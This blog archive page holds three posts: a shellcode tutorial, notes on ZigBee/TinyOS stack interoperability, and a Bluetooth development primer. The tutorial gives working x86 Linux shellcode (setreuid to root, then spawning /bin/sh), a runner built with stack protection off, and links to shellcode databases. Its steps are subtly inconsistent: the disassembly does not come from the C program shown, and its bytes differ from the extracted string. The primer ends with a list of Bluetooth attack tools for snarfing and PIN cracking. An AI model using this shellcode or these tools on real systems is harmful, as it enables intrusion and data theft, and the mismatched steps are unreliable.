Wednesday, 29 October 2014

Shellcode



How to write a simple shellcode?


1. A simple C program that runs /bin/sh
#include <unistd.h>

int main(int argc, char *argv[])
{
   char *shell[2];

   shell[0] = "/bin/sh";   /* program to execute */
   shell[1] = NULL;        /* argv for execve must be NULL-terminated */
   execve(shell[0], shell, NULL);
   return 0;
}
2. Type the commands
# gcc shellexpt.c -o shellexpt

# objdump -d ./shellexpt


./shellexpt:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0      xor     %eax, %eax
 8048076:       b0 46      mov     $0x46, %al
 8048078:       31 db      xor     %ebx, %ebx
 804807a:       31 c9      xor     %ecx, %ecx
 804807c:       eb 16      jmp     8048094 <ender>

0804807e <starter>:
 804807e:       5b         pop     %ebx
 804807f:       31 c0      xor     %eax, %eax
 8048081:       88 43 07   mov     %al, 0x7(%ebx)
 8048084:       89 5b 08   mov     %ebx, 0x8(%ebx)
 8048087:       89 43 0c   mov     %eax, 0xc(%ebx)
 804808a:       b0 0b      mov     $0xb, %al
 804808c:       8d 4b 08   lea     0x8(%ebx), %ecx
 804808f:       8d 53 0c   lea     0xc(%ebx), %edx
 8048092:       cd 80      int     $0x80

08048094 <ender>:
 8048094:       e8 e5 ff ff ff    call   804807e <starter>
 8048099:       2f                das
 804809a:       62 69 6e          bound  %ebp, 0x6e(%ecx)
 804809d:       2f                das
 804809e:       73 68             jae    8048108 <ender+0x74>
 80480a0:       4e                dec    %esi
 80480a1:       41                inc    %ecx
 80480a2:       41                inc    %ecx
 80480a3:       41                inc    %ecx
 80480a4:       41                inc    %ecx
 80480a5:       42                inc    %edx
 80480a6:       42                inc    %edx
 80480a7:       42                inc    %edx
 80480a8:       42                inc    %edx

3. Collect the hex bytes from the asm listing

 "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
 "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
 "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
 "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
 "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
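As an added example (not from the original post), a small Python helper that collects the opcode bytes of an objdump -d listing into the C string form used in step 3 and reports any null bytes, which is why the listing loads registers with xor and an 8-bit mov rather than a 32-bit immediate. The listing excerpt inside it is constructed to mirror the page's _start block, including the int $0x80 of the setreuid call that the step 3 string contains.

```python
import re

# Matches an objdump -d instruction line: "<addr>:  <hex bytes>  <mnemonic ...>".
# Section headers such as "08048074 <_start>:" have no byte column and are skipped.
INSN_RE = re.compile(r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2}\s+)+)")

# Constructed excerpt in objdump format (not copied from the post): the _start
# block with the int $0x80 of the setreuid(0, 0) call, as in the step 3 string.
SAMPLE_LISTING = """\
08048074 <_start>:
 8048074:       31 c0      xor     %eax,%eax
 8048076:       b0 46      mov     $0x46,%al
 8048078:       31 db      xor     %ebx,%ebx
 804807a:       31 c9      xor     %ecx,%ecx
 804807c:       cd 80      int     $0x80
 804807e:       eb 16      jmp     8048096 <ender>
"""

# Constructed contrast: loading the syscall number with a 32-bit immediate
# instead of "mov $0x46,%al" encodes three zero bytes.
NULL_LISTING = " 8048074:       b8 46 00 00 00    mov     $0x46,%eax\n"

def objdump_bytes(listing):
    """Concatenate the opcode bytes of every instruction line, in address order."""
    out = bytearray()
    for line in listing.splitlines():
        m = INSN_RE.match(line)
        if m:
            out.extend(int(h, 16) for h in m.group(1).split())
    return bytes(out)

def as_c_string(raw, per_line=11):
    """Render bytes as the adjacent "\\x.." string literals used in step 3."""
    lines = []
    for i in range(0, len(raw), per_line):
        chunk = raw[i:i + per_line]
        lines.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "\n".join(lines)

def null_byte_offsets(raw):
    """Offsets of 0x00 bytes; a C string copy (strcpy) would stop at the first one."""
    return [i for i, b in enumerate(raw) if b == 0]

if __name__ == "__main__":
    for name, listing in (("_start", SAMPLE_LISTING), ("32-bit immediate", NULL_LISTING)):
        raw = objdump_bytes(listing)
        print("%s: %d bytes, null bytes at %s" % (name, len(raw), null_byte_offsets(raw)))
        print(as_c_string(raw))
```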
4. Create a shellcode program using this hex code
 
/*shell_exec.c*/
#include <unistd.h>

/* 32-bit x86 Linux shellcode: setreuid(0, 0) followed by execve("/bin/sh") */
char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char **argv)
{
    /* creating a function pointer that points at the shellcode bytes */
    int (*func)();
    func = (int (*)()) code;
    /* jump into the bytes; execve replaces the process, so this does not return */
    (*func)();
    return 0;
}
5. Compile and run the code

   #gcc -fno-stack-protector -z execstack shell_exec.c
    
   #./a.out

   On 32-bit Linux, -z execstack is what lets the bytes in the code[] data array execute; with a non-executable data segment the call into code[] would fault instead.
6. Result
      Get a /bin/sh shell
7. Try more shellcode

     Jonathan Salwan's shellcode database
     Shell-code project
     Shell-code Python injector (released; download)
     Shell-code tutorials (T1, T2)
     Exploit DB

Tuesday, 28 October 2014

XBee IEEE 802.15.4 ZigBee OEM Stack Interoperability Issues with TinyOS IEEE 802.15.4 Stack


  1. The main problem in porting the stack over the IEEE 802.15.4 lower-layer stack is the lack of hardware and software specification details on important aspects of beacon-enabled mode and the cluster-tree model.
  2. Synchronization techniques in cluster-tree deployments are another issue. To build a cluster network, synchronization is essential, especially between the ZR, ZC and ZED when all the devices work under one PAN ID. Moreover, if a node is not properly synchronized there is a possibility of collisions in the GTS slots (which provide guaranteed time to each device that intends to connect to the network); a stack overflow is the result of this problem.
  3. XBee is a ZigBee Alliance Group device and uses the ZigBee-compliant IEEE 802.15.4 stack for wireless communication. TinyOS is not ZigBee, but the MICAz mote we use here is a ZigBee Alliance Group device. That does not mean communication between the two is possible; for that we need a ZigBee IEEE 802.15.4 stack in TinyOS on which to build the ZigBee protocol stack.
  4. The time the CC2420 radio chipset takes to switch between transmitting and receiving data over the radio is 192 microseconds, which differs from other stacks, especially in Alliance-group devices like the OEM modules.
  5. In addition, the processing power available in the motes' microcontroller turned out to be quite limited for complying with the most demanding IEEE 802.15.4 timing constraints, especially for small beacon orders (BO < 3) and superframe orders (SO < 3). This makes those superframe configurations impossible to deploy, considering that the mote must also remain available to process other tasks.
  6. The ZigBee protocol stack has some processing limitations on the ATmega128RF; only a smarter and faster microcontroller overcomes this difficulty. The OpenZB forum expects to overcome this in the near future.
  7. The default TinyOS scheduler supports neither task prioritization nor pre-emption. Typically there are two kinds of interrupt events in TinyOS, timers and radio; these events are captured by event handlers that normally post a task to the FIFO task queue, which significantly impacts the behaviour of the protocol stack.
  8. The interference between IEEE 802.15.4 and IEEE 802.11 radio channels, confirmed using an FFT spectrum analyser, had unpredictable effects on the results.
  9. Physical-layer related problems.
  10. Interference between radio channels (overcome the interference between the two standards by using the only IEEE 802.15.4 channel, channel 26 in the 2480 MHz band, that is completely outside the IEEE 802.11 frequency spectrum).
  11. RSSI-based localization inaccuracy (problem solved in OpenZB).
  1. The synchronized data request/reply method used in the XBee ZigBee Alliance Group device, due to the accommodation of a large collection of devices in the network.
  2. Timeslot registration techniques for a frame differ a lot between TinyOS and XBee devices. In TinyOS the DESTINATION device sends a frame to the SOURCE device using the BROADCASTING timeslot channel, but in XBee only a BROADCASTING frame is allowed to pass through the channel.
  3. TinyOS doesn't have any superframe scheduling mechanism for handling multiple packets from the SOURCE devices.
  4. The TinyOS stack is NOT multi-lingual, nor is it very flexible. You basically compile with a group of defines set that determines exactly what kind of packets one is interested in. This is an artifact of TinyOS motes being extremely resource-constrained.
  5. TinyOS does not follow any accurate simulation model for the IEEE 802.15.4 and ZigBee protocols focusing on the Guaranteed Time Slot (GTS) mechanism and the ZigBee hierarchical routing strategy in beacon-enabled cluster-tree wireless sensor networks.
  6. Implementing an energy-efficient beacon-enabled routing mechanism in TinyOS is a really challenging task.
  7. XBee uses 16 channels with a 5 MHz channel spacing [2 MHz channel width] and 16-ary orthogonal DSSS for maintaining dynamic timeslot allocation for frames from the devices. TinyOS and OpenZB have no mechanism like that and use time-division based frame synchronization techniques [TDMA].
  8. A ZigBee-compliant IEEE 802.15.4 stack differs depending on its specification and networking topologies.
  9. In ZigBee wireless sensor technology, mainly three networking topologies are used for constructing a sensor network. According to the current IEEE 802.15.4/ZigBee specification, the synchronization technique in each topology differs from the others in beacon-enabled mode. The OpenZB forum says that they successfully resolved this issue by applying a time-division based synchronization technique.
  10. The OpenZB forum built its ZigBee stack on top of a modified IEEE 802.15.4 that is very much compatible with their stack. So we cannot expect this device to communicate with existing ZigBee Alliance Group devices like XBee.
  11. I am still working on the OpenZB implementation on the MICAz mote device, because vendors say that this device is a ZigBee Alliance group device and that it has an OEM-modified IEEE-compliant stack at the bottom layer of the stack, so it can support the ZigBee protocol stack.
These are some issues faced while building an interoperable ZigBee stack over IEEE 802.15.4 on TinyOS/MICAz devices. An IEEE 802.15.4 ZigBee-compliant stack, a synchronization scheduling mechanism, a suitable superframe allocation method for avoiding frame collisions and guaranteed GTS for devices are some MAJOR ISSUES.
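As an added check on item 10 of the first list (not part of the original post): which IEEE 802.15.4 channels lie clear of the 2.4 GHz IEEE 802.11 channels in use at a site. It assumes the standard channel plans (802.15.4 channel k centred at 2405 + 5(k-11) MHz and about 2 MHz wide; 802.11 channel n centred at 2407 + 5n MHz and about 22 MHz wide) and generalises the post's channel-26 observation to any set of Wi-Fi channels.

```python
# Added example, not from the post. Assumed channel plans:
#   IEEE 802.15.4 (2.4 GHz PHY): channel k = 11..26 centred at 2405 + 5*(k-11) MHz,
#   occupying about 2 MHz.
#   IEEE 802.11 (2.4 GHz): channel n = 1..13 centred at 2407 + 5*n MHz, occupying
#   about 22 MHz (DSSS); OFDM channels are slightly narrower, which only helps.

def zigbee_band(k):
    """Occupied band (lo, hi) in MHz of IEEE 802.15.4 channel k."""
    if not 11 <= k <= 26:
        raise ValueError("2.4 GHz 802.15.4 channels are 11..26")
    centre = 2405 + 5 * (k - 11)
    return centre - 1, centre + 1

def wifi_band(n, width=22):
    """Occupied band (lo, hi) in MHz of 2.4 GHz IEEE 802.11 channel n."""
    if not 1 <= n <= 13:
        raise ValueError("only channels 1..13 follow the 2407 + 5n rule")
    centre = 2407 + 5 * n
    return centre - width / 2, centre + width / 2

def overlaps(a, b):
    """True when two bands share more than a single edge frequency."""
    return a[0] < b[1] and b[0] < a[1]

def clear_zigbee_channels(wifi_channels):
    """802.15.4 channels that overlap none of the given 802.11 channels."""
    bands = [wifi_band(n) for n in wifi_channels]
    return [k for k in range(11, 27)
            if not any(overlaps(zigbee_band(k), w) for w in bands)]

if __name__ == "__main__":
    plans = (("1/6/11 plan", [1, 6, 11]),
             ("all of 1..11 (North America)", range(1, 12)),
             ("all of 1..13 (Europe)", range(1, 14)))
    for name, chans in plans:
        print("%-30s clear 802.15.4 channels: %s" % (name, clear_zigbee_channels(chans)))
```

With Wi-Fi channels 1 to 11 in use, only channels 25 and 26 stay clear, which is the post's observation; where channels 12 and 13 are also in use, no 802.15.4 channel is completely free of 802.11 energy.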

Bluetooth Development Essential


A short-range wireless communication standard for sharing data end to end between two devices. Like other short-range wireless communication standards, Bluetooth uses the unlicensed 2.4 GHz band for its baseband and physical layer. It has a protocol stack for performing end-to-end applications and supports a wide range of applications in different embedded devices for short-range communication. It has now become an essential communication standard in smartphones and other devices on the market. Before developing an application for Bluetooth we should know it well to ease the development.

Bluetooth versions

   The Bluetooth Special Interest Group (SIG) is the body that oversees the development of Bluetooth standards and the licensing of the Bluetooth technologies and trademarks to manufacturers. The following are some Bluetooth versions that we are currently using in different sectors.
Bluetooth Protocol Stack

Baseband + Bluetooth Radio - the physical-layer operation of Bluetooth, i.e. the transmission of data from one end to the other.

LMP - Link Management Protocol, which provides a link to the application over the link channel and also takes part in multiplexing channels using the PSM code at the link layer.

RFCOMM - RF virtual COM port, a serial-communication emulator.

BNEP - Bluetooth Network Encapsulation Protocol, which provides a network stack on top of Bluetooth so that SOCK_SEQPACKET and SOCK_STREAM socket communication with a device is possible.

L2CAP - Logical Link Control and Adaptation Protocol, which provides a logical link connection to RFCOMM and any other application-layer protocol in the stack.

OBEX - Object Exchange Protocol, an application-layer protocol for performing data-exchange operations between devices.

SDP - Service Discovery Protocol, which helps acquire information about the services running on a Bluetooth device.
 
Network topology
 
   Bluetooth has one topology, named "scatternet", which helps build a network of Bluetooth devices, but there are only a few implementations of it in practical scenarios. A scatternet is actually a collection of small nets of 7 Bluetooth nodes, called piconets. A piconet consists of 7 nodes, and each node performs a direct link-to-link connection between two nodes. The node that hosts all the other nodes in the network is called the "MASTER node", and a node that intends to connect to the MASTER node is called a SLAVE node.

Bluetooth Development Library

BlueZ :-
   If you are using Linux you can install it from the repository with the command
      #sudo apt-get install bluez
hcidump :-
   Promiscuous sniffer for Bluetooth
      #sudo apt-get install bluez-hcidump
BlueCove :-
   BlueCove is a Java library for Bluetooth application development and it runs over a Java Virtual Machine.

Bluetooth Hacking Tools

BlueScanner – BlueScanner searches for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.
BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that support JSR-82, the Java Bluetooth specification.
BTCrawler – BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service queries. It implements the BlueJacking and BlueSnarfing attacks.
Hacking Bluetooth Devices
BlueBugger – BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain unauthorized access to the phone book, call lists and other private information.
CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only supports some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. It should work on any PocketPC with the Microsoft Bluetooth stack.
Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like BlueBug, BlueSnarf, BlueSnarf++ and BlueSmack, has features such as Bluetooth address spoofing, an AT and an RFCOMM socket shell, and implements tools like carwhisperer, bss, an L2CAP packet generator, an L2CAP connection resetter, an RFCOMM scanner and a green plaque scanning mode.
Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.
Bluesnarfer – Bluesnarfer will download the phone book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flaw discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner and gain access to restricted portions of the stored data.
BTCrack – BTCrack is a Bluetooth passphrase (PIN) cracking tool. BTCrack aims to reconstruct the passkey and the link key from captured pairing exchanges.
Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.
BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.